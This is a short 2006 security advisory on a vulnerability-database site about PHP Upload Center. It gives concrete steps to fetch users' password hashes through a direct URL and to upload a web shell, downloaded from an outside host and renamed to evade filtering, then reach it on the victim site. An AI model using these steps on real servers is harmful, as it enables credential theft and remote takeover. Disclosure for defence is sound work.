Security Advisory: PHP Upload Center Download users password hashes And phpshell Upload - security vulnerabilities database

[EN] securityvulns.ru
no-pyccku

Related information
  Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)
  [KAPDA::#33] - GuppY <= 4.5.11 Remote DoS vulnerability
  [SA19191] Hosting Controller "search" Forum SQL Injection
  Advisory: Jiros Banner Experience Pro Remote Privilege Escalation.
  [eVuln] FreeForum PHP Code Execution & Multiple XSS Vulnerabilities

From: :) :) <liz0_(at)_bsdmail.com>
Date: 10.03.2006
Subject: PHP Upload Center Download users password hashes And phpshell Upload

PHP Upload Center Download users password hashes And phpshell Upload

Site:http://ksv.hypermart.net/php/
----------------------------------------------------
1)Download users password hashes:

http://victim.com/path/users/username

2)phpshell Upload

Example:

Download http://geocities.com/liz0zim/shell.php

And shell.php Save As shell.php.li

And Upload Web Sİte

http://victim.com/path/files/shell.php.li

----------------------------------------------------
Credit :Liz0ziM
Website:www.biyosecurity.com
Mail   :liz0@bsdmail.com

------------------------------------------------------

Source:
http://www.blogcu.com/Liz0ziM/317250/
http://biyosecurity.be/bugs/phpuploadcenter2.txt

About | Terms of use | Privacy Policy
© SecurityVulns, 3APA3A, Vladimir Dubrovin